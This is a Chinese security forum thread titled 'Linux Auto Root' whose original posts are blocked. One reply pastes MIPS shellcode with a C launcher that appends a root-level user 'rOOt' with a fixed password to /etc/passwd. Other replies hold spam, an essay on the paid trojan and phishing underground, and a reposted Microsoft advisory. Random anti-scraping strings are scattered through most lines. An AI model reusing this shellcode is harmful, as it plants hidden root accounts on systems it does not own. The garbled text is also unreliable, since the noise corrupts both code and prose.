Board logo

标题: [技术讨论] Linux全自动提权脚本(Linux Auto Root) [打印本页]

作者: vini5    时间: 2011-7-19 13:38     标题: Linux全自动提权脚本(Linux Auto Root)

提示: 作者被禁止或删除 内容自动屏蔽
作者: 無情    时间: 2011-7-20 08:03

回复 1# vini5
, p# K$ r: R5 I  P
. y8 u- `2 z* r: H% h' P( |; L
  a: v& E/ K2 z6 S    Ubuntu可是少见Xday哦。- J1 S4 w. I0 X% J/ D& j, x) U) g

& p  c' s1 g+ ^6 n" s1 `    全自动溢出的好处就是不需要去找对应的EXP,充分发挥了计算机的作用。: ~' H" |  `: x7 `
   
作者: vini5    时间: 2011-8-13 08:15

提示: 作者被禁止或删除 内容自动屏蔽
作者: xin00000    时间: 2019-5-31 23:01

Linux/MIPS -add user(UID 0) with password
* Date:   2011-11-24; u/ y6 T' P, q: g3 f7 y
* Author: rigan - imrigan [at] gmail.com
' \5 v3 u  G$ Q * Note:
- F& x+ K4 s, B1 e/ Y7 D* j *         Username - rOOt
8 D' C  K6 ?7 t0 a% |9 l) x *         Password - pwn3d
, d9 b' j$ p8 Q$ f */
2 m1 [0 e. n( V1 y1 O, x( O : g9 y& q- Y6 L5 S% C# t- }: B
#include <stdio.h>
) X, a( B3 @' }4 p/ N/ ]) L7 D9 k
6 x$ B! c# g4 Echar sc[] =* X5 g, J. [8 z$ f1 X. c$ x
        "x24x09x73x50"       //  li      t1,295204 J* G+ ]+ ]: k" N
        "x05x30xffxff"       //  bltzal  t1,400094 <L>
! o+ B* |. M) b% }( i6 S5 O* d        "x24x09x73x50"       //  li      t1,29520 (nop)
/ Z( N  _0 L  h) ^. G     
$ V# i+ O3 J7 P8 o! e4 |     /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND); */# @. t- X( Z) d' U& c; D' W( n/ k
        "x3cx0fx30x2f"       //  lui     t7,0x302f
9 A2 j' n. K) k& S# K0 I        "x35xefx65x74"       //  ori     t7,t7,0x6574+ V" f' Z' v* q/ A
        "x3cx0ex63x2f"       //  lui     t6,0x632f   
; Q; f$ `0 h* }8 K' F2 R2 S        "x35xcex70x61"       //  ori     t6,t6,0x7061
( ^! p# Y6 }) k1 p: n) y. r, D        "x3cx0dx73x73"       //  lui     t5,0x7373
7 l& x& v+ u) {) x% K: D0 U5 x        "x35xadx77x64"       //  ori     t5,t5,0x7764
0 \1 l+ `: i* ^1 p3 a$ j        "xafxafxffxf3"       //  sw      t7,-13(sp): }) D2 i7 i' {/ M, b8 U. B
    "xafxaexffxf7"       //  sw      t6,-9(sp)
. e/ e, g+ X* B6 D7 q* j    "xafxadxffxfb"       //  sw      t5,-5(sp)% s0 \. z8 c% M. t. P8 c3 ~
        "xafxa0xffxff"       //  sw      zero,-1(sp)! j! o8 B) F6 G6 R  d' h! H
    "x27xa4xffxf4"       //  addiu   a0,sp,-12
' D# U% @! \8 w! X; j$ W) I        "x24x05x01x6d"       //  li      a1,3651 e* N* Z7 X: i
        "x24x02x0fxa5"       //  li      v0,4005
4 }+ V9 r) V1 F# ]        "x01x01x01x0c"       //  syscall 0x40404
- s, L/ e& k. O5 G , L/ Y/ x" j1 I
    "xafxa2xffxfc"       //  sw      v0,-4(sp): h; v/ ?6 p8 z, W* A
     ) p: m: ?' y' g* \3 Q, J8 E
     /* write(fd, "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bash' x: d4 V' D) N
", 45); */
/ f9 x- d3 O! Z" A  F: u/ j% }        "x8fxa4xffxfc"       //  lw      a0,-4(sp); ^7 |1 ]" F; I0 d7 A) R7 d+ y
        "x23xe5x10x0c"       //  addi    a1,ra,4108; R) i$ ~7 [8 f' a% \6 f+ U
        "x20xa5xf0x60"       //  addi    a1,a1,-4000
7 t. n. A% a8 z/ b+ e- S        "x24x09xffxd3"       //  li      t1,-45
$ Q. c$ S2 U9 }8 B* Q        "x01x20x30x27"       //  nor     a2,t1,zero( z9 b& m0 }$ r
        "x24x02x0fxa4"       //  li      v0,4004# n+ V* X# c8 `. q
        "x01x01x01x0c"       //  syscall 0x40404+ |, x) e% x$ i% m  O  g5 s
         ' p# L  E2 |) D' a7 }
      /* close(fd); */
0 K# S& X0 Z: M/ D# s9 P        "x24x02x0fxa6"       //  li      v0,40064 l* @6 y  B8 K, s; d
        "x01x01x01x0c"       //  syscall 0x40404
" Z; K1 _% U8 G# n' x' w* a% c- a     9 j* C/ e. X) b$ j- P# U
      /* exit(0);  */
1 b3 I/ i2 \" e, n       "x28x04xffxff"        //  slti    a0,zero,-17 A$ T7 `/ V! [) o* \' \
       "x24x02x0fxa1"        //  li      v0,4001. y$ n, C, f0 n; ?+ [0 U
       "x01x01x01x0c"        //  syscall 0x404048 }( [3 n$ S( F2 Y8 f
      # H" u/ ]# a: b7 O4 y; k' d$ c
      /*  "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bash1 W4 E& v% x  O2 Q* b- U; x
" */3 ?7 L9 s# o+ b2 a* y! |5 R  _
       "x72x4fx4fx74"      
/ o: t+ A1 e8 I& u       "x3ax58x4ax31"      
1 Z7 u3 C6 f' f4 C1 K& n+ O1 ^+ r       "x47x56x2ex6e"       8 k1 G. [5 b# r; K
       "x79x46x46x4d"      
7 @5 K' f! `7 t2 F: I' F4 Z9 {       "x6fx49x3ax30"      
7 I' i3 ], u, B2 @" q       "x3ax30x3ax72"       9 ^+ l8 I* L, V. H% m
       "x6fx6fx74x3a"      
8 e/ \* R9 l2 K% F% u+ C       "x2fx72x6fx6f"      
: M2 @7 u- \; D1 |5 Y. D7 o       "x74x3ax2fx62"      & }/ V, F6 P( P3 N5 f) S. a
       "x69x6ex2fx62"      
5 {2 \- P" N3 I6 o2 @/ N- w* @       "x61x73x68x0a";      
. l0 e2 Q1 C" @5 }8 A       4 M& Y  Q# V2 I" p
void main(void)
3 T9 R1 n  m8 _3 ~* M' i# J{
% ?/ j5 t/ S, u+ G" M       void(*s)(void);5 f; n9 D7 e. h) S+ g! g. ~
       printf("size: %d2 Z' [5 ?0 `$ \/ Y' q9 I5 S7 h
", strlen(sc));
. j3 N0 Z* m: i$ M       s = sc;
: g" F8 ]* Z' M+ E1 ]       s();' n! V9 ~2 }! O
}+ c+ \) |* L; X8 i/ X: @

4 Q$ f8 f- L  O( |5 C4 _, z! d/ S$ K& Q! Q/ [9 f* X
7 b; M8 z. |5 H" Y- H

0 _+ K# l- ^) P" Z' J+ w& u' s6 v2 v: r# c0 ]$ l

. N% Z) {$ n: c0 k& |& g% z2 k! P& H% \% |
. Q' t' u3 x/ s, p3 f7 {' m
' o, E* \0 r2 q: c

' x8 o  }" t) ^/ H6 `- F/ H: ~" V! B5 S# q* I
* t0 o- h+ o5 F
2 c$ l) u" [) X6 w
. Y9 H) |- `6 y4 {! a8 N
$ d0 O. ]$ Z, [( A: p7 R% W
1 R( D! S' `- X' B

: z2 J" ]9 J/ d5 {6 E+ G% \, C7 H  w; j, C3 F: M( z2 n
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: dg86760517    时间: 2019-6-12 23:01

顶顶更健康,越顶吃的越香。
" A  ^, O8 W% e+ Z( Z( `
( H& R9 f% m6 C2 ~* Z! P" k7 `$ F% P3 @0 @+ X
) E0 n0 p: y" b6 k) J2 k

3 ?* K8 G0 z$ u
) \5 P# o, |# d( s$ F; u7 O% U) ?. q7 p4 R
. p$ e7 O+ g/ v: Y% A4 a

" @/ G% U4 P; Y: o+ F' j: J+ M" Y: O6 V. j
2 N3 j* }3 E& a3 n2 d

  |; ]  }+ @; S% @# Y- u7 S$ `) P+ P, k9 {
7 i3 B, `( y: t7 C% d
; W3 _1 v: e: K7 n9 M  I

: k" H- i) ]& L8 I1 |3 A
7 i7 ^- B# s7 V6 p! O; _
# t% x5 {5 k* w9 x$ h
$ h" i& l) G. e公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: xin0000    时间: 2019-7-25 23:55

在windows目录下有很多这样的文件夹:$NT是病毒吗?
这个是自动更新后留下来的备份文件,比如$NTUnijstallKB927779就是KB927779更新后留下的!7 W1 u* R. {% `# Y7 x

0 x& q3 n4 E; m6 \  a0 d
, j  a$ m4 A2 X- R# L& I( ], Q' |* b/ X# y0 {  {2 z( P2 N
5 g0 r  h4 R; {1 ?( J1 }, l* {
3 h, `' p. P( I, x
) X+ T( J' \( @/ |5 B% \* Y7 @

8 v# g- l: D. z$ y
) B7 P6 M- C9 `6 M+ V" u& }9 u( ], @" Z" i; z3 N  U  z. m- }

+ i5 O; }' k2 ^! L8 P! ~3 r2 b. J/ k. }5 g

0 f: z8 g# _: P. g2 K$ c+ y7 c' q5 k- E. s6 I! V
7 u# r: R+ G0 F- u) f: L0 `
5 ?7 l7 X$ A2 w6 S! R
! ?0 L4 q2 D. @$ C

. k- G0 K8 O) O: U8 e7 {5 y3 v2 x& W1 h6 F1 P2 U6 k
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: 路过    时间: 2019-8-21 23:55

照你这么说真的有道理哦 呵呵 不进沙子馁~~~ " e. o' i2 s: P+ j5 ~
- j3 W1 l9 c( ?7 a3 k5 O5 j8 g) A

1 M2 [+ A6 p3 A
  N3 a# X& o/ ^+ N
) N2 w' m/ I. L$ g. ^6 I
' v3 r( U; p2 L" N9 Q" a1 s; l; W  x. W$ ?
6 h- _' {+ {" O2 \. k) A8 q
4 U* p; P2 E9 z+ R6 J! X7 O8 x
. w6 t' y3 m7 B/ F1 s! Q

4 W3 |5 ?# t. S' ^6 W, z5 `8 {/ l, B8 K* j: `
2 C8 x% d8 Q/ c& n) R

+ ]3 n' u& ^9 Q0 w$ j4 x2 V- |% c3 C
  @6 W: b! W( c9 r2 m

  U6 G0 p3 m+ x# ^- a" }
0 {, s# D; V$ C! `2 H
$ K2 `+ R" n8 i7 r公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: ndragon    时间: 2019-10-26 23:20

黑客游戏潜规则
“QQ木马求挂(无后门绝对免杀),按信封收费180元/W,进1W结算一次或每日0点至凌晨1点结算。结算方式:即时支付宝或工行转帐。联系QQ:XXXXX(请注明带挂QQ木马马)……收肉鸡了,收流量了,出售QQ号……”
" Y' b8 u4 }$ K, G5 t, E8 a
  看到这些信息你的表情也许可以用惊愕来形容,但对于另一些人来说,对这些信息已经习以为常了,因为这些信息经常会在一些技术群,网络安全站点上的论坛中出现。随着信息化社会的发展,各种各样的需求也在层出不穷的涌现。一些有技术的“黑客”们都在考虑如何让手中的那些代码转变成money,在他们眼中,也许能证明自己存在的价值早已蜕变成“这段代码到底能换多少张人民币”了,过去我们经常说“一切向前看”,如今都变成了一切向“钱”看了。

. Y, n( _/ P' w- |6 M, w' Y9 g2 J
  潜规则一:马披龙袍装麒麟,不变的是本质 从灰鸽子说黑客技术演进
4 l: v7 U- k# `7 ^! B
  2003年初,互联网诞生了一个名为灰鸽子的工作室,开发出一套名为“远程控制系统”的软件,当时经过笔者的一些分析后,觉得还是把它定义为木马比较恰当。在后来,特别是今年,也验证了笔者当时的定论。“灰鸽子远程控制管理系统”只是木马的一个“马甲”而已。提到木马就不得不说一下著名的“冰河”(作者:黄鑫),它是早期的木马软件之一,操作简单方便,基于c/s(客户端/服务器端)模式开发。说到操作简单,你只需要在入侵后的主机上安装一个server.exe,在操作的主机安装client.exe就可以了。正是因为它容易上手,所以被更多的“黑客”们利用。如今的灰鸽子也是基于这样的技术架构开发出来的,但是它确实也有很多的改进,有自己独特的东西在里面,现在的灰鸽子可以被简单定位为反弹型后门木马。

5 u# S. T9 W8 ]: t5 q( c
  作者开发这个软件目的也许是想更加方便的管理远程主机,服务器等,又或许是想靠“远程控制软件”这个华丽的外表,赚取了更多的money。但无论出于什么样的目的,这款软件随着编写技术的提升,和产品的不断改进,逐渐出现了能逃避杀毒软件的版本。笔者曾经拿到这样的版本,在经过技术分析之后,得出以下结论:新版本的改进主要体现在加壳技术上,在原灰鸽子的基础上加层保护壳,使杀毒软件库中的病毒特征码无法与之匹配,从而达到躲避杀毒软件围剿的目的。目前,它的最新版本仍然可以轻松躲过瑞星、卡巴斯基、nod32等知名杀毒软件。
9 o* b! ^# l/ R; E! R/ y
  此规则点评:一场没有结局的猫鼠游戏,安全厂家不断的招募民间黑客提升自身产品实力,从而促使地下黑客技术不断完善,用于躲避追杀。说实话,谁都不容易。

5 u# C6 ?$ [) @0 N0 j) j
  潜规则二:我出力,你付钱 这是理所当然 利益驱使黑客变质
: E+ G* |( X+ A7 n: e0 M7 t
  杀毒软件的原理主要是靠特征码比对技术,根据用户提交或者其他渠道捕获到的病毒样本制定出相应的病毒库,而病毒库中并没有真正的病毒源代码,只是病毒特征码。灰鸽子经过不屑的努力,终于飞进了千家万户,在非常多的主机和服务器上“落户”,给国家和个人的计算机系统造成了严重影响,一些“黑客”通过灰鸽子将个人用的生活照,夫妻照片等个人隐私泄露到网络中,而把政府机关和企业的一些机密信息拿来和business spy(商业间谍)做现金交易。总的来说这些都是利益驱使,更多的“黑客”会认为这是他的劳动所得,是靠双手和脑力劳动换取过来的,符合一分耕耘,一份收获的逻辑推理。

; l  h* S& W+ p7 d5 L" X
  此规则点评:千古不变的至理名言——有钱能使鬼推磨。付出当然就要有实实在在的收获,谁说我做的不对,那准是在嫉妒,我是黑客我怕谁。
$ |# I! w% b/ p3 r( s- K
  潜规则三:一山不容二虎 两个和尚没水喝

# |8 j9 s( D/ A" E
  2004年圈子出了更火暴的事情,因为入侵某官方站点的游戏数据库而获的不菲的利润,后因在分钱问题上,意见不和,用经济术语来讲就是不能达到利益共同点,最后两人在京城大打出手,双方都有一些损失由此演出了一场真人pk。后来两个主角还觉得不够过瘾,最后直接在著名的圈中论坛安全焦点上进行了长达100多页以上的对骂。更多圈子里面的人发表的看法是狗咬狗一嘴毛!入侵数据库虽说是赚钱,但是这钱来是见不得光的。当然,你是辛苦了,努力了,但是这是通过非法手段入侵得到的,从法律上说这就是违法的事,说起这两个人也是圈子中的名人,由于身在圈中的关系,两位主角的名字就不方便透漏了。

6 {* T# i9 ~3 M' |
  此规则点评:黑客讲究协同作战,默契的配合永远都很重要,但在利益面前,团结的力量很容易疲软。这也是当今社会的普遍存在的潜规则。
( g# v9 l; `; s' w' H  M3 R
  潜规则四:黑客眼里没有拿不下的山头

. H$ d. R0 ~& `- g  p  r8 N5 N
  越来越多的“黑客”都在靠“技术”吃饭,有些黑客拿下网络游戏数据库,通过提权后弄到整个服务器的控制权,刷装备,换金币来完成一些游戏装备交易;还有一些人甚至拿下境外的高利贷,赌博站点,在获得个人信息后,联系犯罪组织,狂刷受害人的信用卡,疯狂的购物;还有人利用技术制造出虚假银行站点,通过phishing(网络钓鱼)手段获取那些使用网上银行用户的真实信息,使用keybord loger (键盘记录器)或木马来捕获对方录入信息,从而拿到受害人个人信息,银行帐号的卡号及密码记录。
* R7 w3 `" P+ |9 [$ E5 h
  此规则点评:只要被黑客盯上,如果没有强大的反黑力量支持,那你可以直接准备后事了。就算是有反黑的实力,毕竟明枪易躲,暗箭难防。
. E/ S% \' {8 N- K6 |. v2 _4 C
  综上所述:各行各业都有道,有规则,黑客界里也一样,有人说黑客更多的给人的感觉是网络上收费的保安,保镖,安全公司呢就是镖局。互联网就是个虚拟的江湖,但是黑客是真实存在的,他们在里面充当着黑与白的角色,有的是充当杀手(破坏者cracker),有的是充当保镖(hacker),这就是黑客圈中的潜规则。江湖中,黑色交易每天都在幕后进行着,潜规则也将继续存在……。
( [6 N- [( D/ e; O( V
  未来的网络安全是不容忽视的,笔者在这里提醒广大的计算机用户:在熟练使用电脑的同时,要先学会保护自己,提高自身的网络安全知识和认识,这样至少可以避免一些不幸的发生。最后奉劝那些只想着赚钱的黑客兄弟们一句话:常在江湖混,早晚要还的,还是多做一些善事吧!

. ~, q- G$ D, ~9 q4 B2 L2 P9 c9 L5 ~5 `
0 O8 L7 K: d; S0 j/ ?

: v5 T# Y' z1 i6 X# c8 S; o" G+ R5 `' Z; V) E' \
4 D; v/ H0 A1 N1 [+ f
. t" z+ {2 ~* c) F

# i& g; B; J/ V; K9 B, S. g2 V* \, k

/ ?2 {" X$ H0 A
- s# x* L2 ]2 M4 _5 W4 ~
* M, p! g# G# n
9 o! o. d, B& }+ w! o) L0 \
* J* S7 x6 h. E9 ^6 l5 b& T1 @3 F
: _: D- |7 J3 k4 J9 @8 o* t

( i# @9 ~9 Y0 z0 _: Y& X  X2 J7 z# a4 D% P
% O( U( F8 L3 A, E& \
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: webmaster    时间: 2019-10-30 23:55

MS07-055:Kodak图像查看器可能允许远程执行代码
发布日期: 十月 9, 2007版本: 1.0

7 Z7 Q$ Z1 e6 c1 s' g
此严重安全更新可消除一个秘密报告的漏洞。 Kodak 图像查看器(以前称为 Wang 图像查看器)处理特制图像文件的方式中存在一个远程执行代码漏洞。 该漏洞可能允许攻击者在受影响的系统上远程执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

; {6 v6 L  G9 G$ Z5 A1 k) T
此漏洞仅存在于运行 Windows 2000 的系统上。但是,如果是从 Windows 2000 升级的,运行受支持版本的 Windows XP 和 Windows Server 2003 也可能受影响。这是 Windows 2000 Service Pack 4、Windows XP Service Pack 2 以及 Windows Server 2003 的受支持 32 版本的重要安全更新。此安全更新通过否决不再支持的文件类型并改进 Kodak 图像查看器处理特制文件类型的方式来消除此漏洞。

! G8 m& z0 a9 h
建议。 Microsoft 建议用户立即应用此更新。
% i9 j; E7 N1 M+ q$ e6 M3 Q! f+ t! r
受影响的软件
& V( J( n" i/ V6 s: T# B: J
操作系统 最大安全影响 综合严重程度等级 此更新替代的公告  Microsoft Windows 2000 Service Pack 4 远程执行代码 严重 无 Windows XP Service Pack 2 远程执行代码 严重 无 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 无
4 X, K- d) p3 l$ y, D, o8 h
注意:除非是从 Windows 2000 进行升级的,否则 Windows XP 和 Windows Server 2003 所有受支持的版本不容易受到攻击。
4 g; d& \& [& L( i( X
不受影响的软件

; o2 J& Y+ a3 x# A" B. l; I
操作系统  Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) Windows Vista Windows Vista x64 Edition
9 F! W& g( K, j/ f
微软的安全公告:

+ |8 Z! e, L% D, ^$ S
http://www.microsoft.com/china/technet/security/bulletin/MS07-055.mspx

+ O/ n5 `* X- p0 d' N
(以上链接均连到第三方网站)

) m4 n/ m: W+ |9 w
' H( a5 d: H! Y! B/ d' j. p
0 T% @! H( r, B( _& ?, Z0 d. w0 D* j! n

# t( X) }- o% W/ U
) g% O/ V2 r7 ]# v4 K  w! p9 ^5 ~5 g# L" Q& n2 u! E5 l. ^

8 q) o4 b) o6 |# L. K$ g  \% U* i# I& B
  V- \6 q: j+ _/ J$ ]
4 C8 u3 Q3 F% a& U4 l* y' ~/ w8 s

* q2 _5 O: h- E) B( V* }6 b/ J
' g# q$ y: Z( t. R2 @" Z& o6 L6 b- j' Y

, b  U  t" ], R0 `* J2 H
# K* Y- h% i! |7 E7 R  w5 J- B* {. F1 m; G) s- i/ q+ Q4 S% l. E8 w

' Z- c% B. k4 v/ p6 b$ y( n2 O/ A: j; j% ?# H
公告:https://www.sitedirsec.com公布最新漏洞,请关注




欢迎光临 非安全中国网-官方论坛{sitedirsec} (http://sitedirsec.com/) Powered by Discuz! 7.2